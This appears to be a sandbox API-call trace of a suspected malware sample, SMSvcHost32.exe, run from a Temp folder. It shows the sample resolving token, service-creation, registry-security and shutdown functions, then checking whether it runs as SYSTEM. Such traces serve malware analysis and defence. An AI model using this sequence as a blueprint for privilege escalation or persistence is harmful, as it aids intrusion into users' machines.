	[0070.822] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileTime") returned 0x765c6a90
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileW") returned 0x765c68c0
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="SetEndOfFile") returned 0x765c6c00
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileTime") returned 0x765c6c60
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtect") returned 0x765b7a50
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0070.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765bcd50
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateProcess") returned 0x765c5100
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteAtom") returned 0x765bcb20
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0070.824] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomW") returned 0x765b1be0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomW") returned 0x765b20f0
	[0070.825] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="CreateProcessW") returned 0x765bb000
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeProcess") returned 0x765bfdb0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemDirectoryW") returned 0x765b9fd0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyA") returned 0x765bea30
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessPriorityBoost") returned 0x765bfef0
	[0070.826] GetProcAddress (hModule=0x765a0000, lpProcName="SetPriorityClass") returned 0x765b9e90
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameW") returned 0x765b9b00
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadPriority") returned 0x765b9990
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatW") returned 0x765dd170
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAlloc") returned 0x765b9950
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFree") returned 0x765bccf0
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyW") returned 0x765dd260
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0070.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathW") returned 0x765c6b30
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileW") returned 0x765c6890
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameW") returned 0x765c6b10
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualFree") returned 0x765b7600
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAlloc") returned 0x765b7810
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="RemoveDirectoryW") returned 0x765c6bf0
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="DuplicateHandle") returned 0x765c6640
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="DisconnectNamedPipe") returned 0x765e0990
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0070.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventW") returned 0x765c66b0
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameW") returned 0x765c46a0
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="WideCharToMultiByte") returned 0x765b3880
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameA") returned 0x765bfbf0
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetShortPathNameW") returned 0x765b2b90
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileW") returned 0x765c6960
	[0070.829] GetProcAddress (hModule=0x765a0000, lpProcName="FindNextFileW") returned 0x765c69a0
	[0070.829] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.829] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0070.829] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.829] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfW") returned 0x7783f890
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="ExitWindowsEx") returned 0x77879430
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="GetShellWindow") returned 0x7782ff50
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0070.830] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0070.830] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.830] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0070.830] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.830] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameA") returned 0x74ac2910
	[0070.830] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupAccountSidW") returned 0x74abf590
	[0070.830] GetProcAddress (hModule=0x74aa0000, lpProcName="DuplicateTokenEx") returned 0x74ac0ad0
	[0070.830] GetProcAddress (hModule=0x74aa0000, lpProcName="GetLengthSid") returned 0x74abf570
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateProcessAsUserW") returned 0x74ac2c10
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="SetTokenInformation") returned 0x74ac3840
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyA") returned 0x74ac09d0
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertSidToStringSidW") returned 0x74abf060
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueA") returned 0x74ad4dc0
	[0070.831] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="AddAce") returned 0x74ac1ee0
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetKeySecurity") returned 0x74ad7830
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAce") returned 0x74ac2550
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAclInformation") returned 0x74ac2570
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="RegGetKeySecurity") returned 0x74ac4190
	[0070.832] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityDescriptorDacl") returned 0x74abfc50
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="CheckTokenMembership") returned 0x74abfb50
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateWellKnownSid") returned 0x74ac0af0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthority") returned 0x74ac0ab0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthorityCount") returned 0x74ac0eb0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x74ac3ba0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclW") returned 0x74ac2bf0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="SetFileSecurityW") returned 0x74ac41d0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyW") returned 0x74abfaa0
	[0070.833] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceW") returned 0x74ac4210
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenSCManagerW") returned 0x74ac0ed0
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="CloseServiceHandle") returned 0x74ac0960
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateServiceW") returned 0x74ad65d0
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="SetServiceStatus") returned 0x74ac0fd0
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x74ac12f0
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x74ac12b0
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyA") returned 0x74ac2500
	[0070.834] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0070.834] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.834] GetModuleHandleA (lpModuleName="Secur32.dll") returned 0x0
	[0070.834] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x6ff60000
	[0070.836] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.836] GetProcAddress (hModule=0x6ff60000, lpProcName="GetUserNameExW") returned 0x7469c5f0
	[0070.836] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.836] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x0
	[0070.836] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0070.961] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.961] GetProcAddress (hModule=0x75120000, lpProcName="ShellExecuteExW") returned 0x752be690
	[0070.962] GetProcAddress (hModule=0x75120000, lpProcName=0x2a8) returned 0x753cdb90
	[0070.962] GetProcAddress (hModule=0x75120000, lpProcName="SHChangeNotify") returned 0x7527cd10
	[0070.962] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.962] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x0
	[0070.962] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x771d0000
	[0070.966] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0070.966] GetProcAddress (hModule=0x771d0000, lpProcName="CoTaskMemFree") returned 0x748d9170
	[0070.966] GetProcAddress (hModule=0x771d0000, lpProcName="CoCreateInstance") returned 0x74900060
	[0070.983] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitialize") returned 0x77201930
	[0070.983] GetProcAddress (hModule=0x771d0000, lpProcName="CoUninitialize") returned 0x748d92a0
	[0070.983] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitializeEx") returned 0x748d88d0
	[0070.983] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0070.983] VirtualFree (lpAddress=0x480000, dwSize=0x32e00, dwFreeType=0x4000) returned 1
	[0070.984] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0070.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413e60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c
	[0070.985] CloseHandle (hObject=0x18c) returned 1
	[0070.985] GetCurrentProcess () returned 0xffffffff
	[0070.985] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0xffffffff) 

Thread:
	id = 60
	os_tid = 0xd5c


Thread:
	id = 61
	os_tid = 0x560

	[0070.986] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0070.986] GetProcAddress (hModule=0x765a0000, lpProcName="SetErrorMode") returned 0x765b8d20
	[0070.986] SetErrorMode (uMode=0x0) returned 0x2
	[0070.986] SetErrorMode (uMode=0x2) returned 0x0
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.986] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.987] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] GetLastError () returned 0x57
	[0070.988] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0070.988] GetProcAddress (hModule=0x75120000, lpProcName="CommandLineToArgvW") returned 0x752cbf80
	[0070.988] GetCommandLineW () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0070.989] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", pNumArgs=0x203fdec | out: pNumArgs=0x203fdec) returned 0x4cfe40*="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0070.989] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d2a88, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0070.989] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0070.989] GetCurrentProcess () returned 0xffffffff
	[0070.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x203fdbc | out: TokenHandle=0x203fdbc*=0x18c) returned 1
	[0070.989] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x203fdc8 | out: TokenInformation=0x0, ReturnLength=0x203fdc8) returned 0
	[0070.989] GetLastError () returned 0x7a
	[0070.989] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x4d0190, TokenInformationLength=0x24, ReturnLength=0x203fdc8 | out: TokenInformation=0x4d0190, ReturnLength=0x203fdc8) returned 1
	[0070.989] ConvertSidToStringSidW () returned 0x1
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.989] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] GetLastError () returned 0x0
	[0070.990] StrCmpIW (psz1="S-1-5-18", psz2="S-1-5-21-2172869166-1497266965-2109836178-1000") returned -1
	[0070.992] LocalFree (hMem=0x4cee98) returned 0x0
	[0070.992] CloseHandle (hObject=0x18c) returned 1
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.992] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
